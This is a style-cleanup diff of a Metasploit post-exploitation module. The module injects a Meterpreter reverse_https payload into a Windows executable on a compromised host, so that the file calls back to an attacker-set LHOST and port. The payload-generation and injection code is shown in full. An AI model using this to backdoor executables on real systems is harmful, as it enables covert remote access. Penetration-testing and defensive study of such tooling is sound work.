@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', "windows/meterpreter/reverse_https"]),
+        OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', 'windows/meterpreter/reverse_https']),
         OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
         OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
         OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
@@ -42,10 +42,10 @@ class MetasploitModule < Msf::Post
     session.core.use('peinjector')
 
     # syinfo is only on meterpreter sessions
-    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+    print_status("Running module against #{sysinfo['Computer']}") if !sysinfo.nil?
 
     # Check that the payload is a Windows one and on the list
-    if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
+    if !session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
       print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
       return
     end
@@ -65,16 +65,16 @@ class MetasploitModule < Msf::Post
   end
 
   # Create a payload given a name, lhost and lport, additional options
-  def create_payload(name, lhost, lport, opts = "")
+  def create_payload(name, lhost, lport, opts = '')
     pay = client.framework.payloads.create(name)
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
     pay.datastore['EXITFUNC'] = 'thread'
     pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
 
-    if not opts.blank?
-      opts.split(",").each do |o|
-        opt, val = o.split("=", 2)
+    if !opts.blank?
+      opts.split(',').each do |o|
+        opt, val = o.split('=', 2)
         pay.datastore[opt] = val
       end
     end
@@ -84,29 +84,27 @@ class MetasploitModule < Msf::Post
   end
 
   def inject_payload(pay, targetpe)
-    begin
-      print_status("Generating payload")
-      raw = pay.generate
-      param = {}
+    print_status('Generating payload')
+    raw = pay.generate
+    param = {}
 
-      if pay.arch.join == ARCH_X64
-        threaded_shellcode = client.peinjector.add_thread_x64(raw)
-        param[:isx64] = true
-      else
-        threaded_shellcode = client.peinjector.add_thread_x86(raw)
-        param[:isx64] = false
-      end
-
-      param[:shellcode] = threaded_shellcode
-      param[:targetpe] = targetpe
-      param[:size] = threaded_shellcode.length;
-
-      print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
-      client.peinjector.inject_shellcode(param)
-      print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
-    rescue ::Exception => e
-      print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
-      print_error(e.to_s)
+    if pay.arch.join == ARCH_X64
+      threaded_shellcode = client.peinjector.add_thread_x64(raw)
+      param[:isx64] = true
+    else
+      threaded_shellcode = client.peinjector.add_thread_x86(raw)
+      param[:isx64] = false
     end
+
+    param[:shellcode] = threaded_shellcode
+    param[:targetpe] = targetpe
+    param[:size] = threaded_shellcode.length
+
+    print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
+    client.peinjector.inject_shellcode(param)
+    print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
+  rescue ::Exception => e
+    print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
+    print_error(e.to_s)
   end
 end
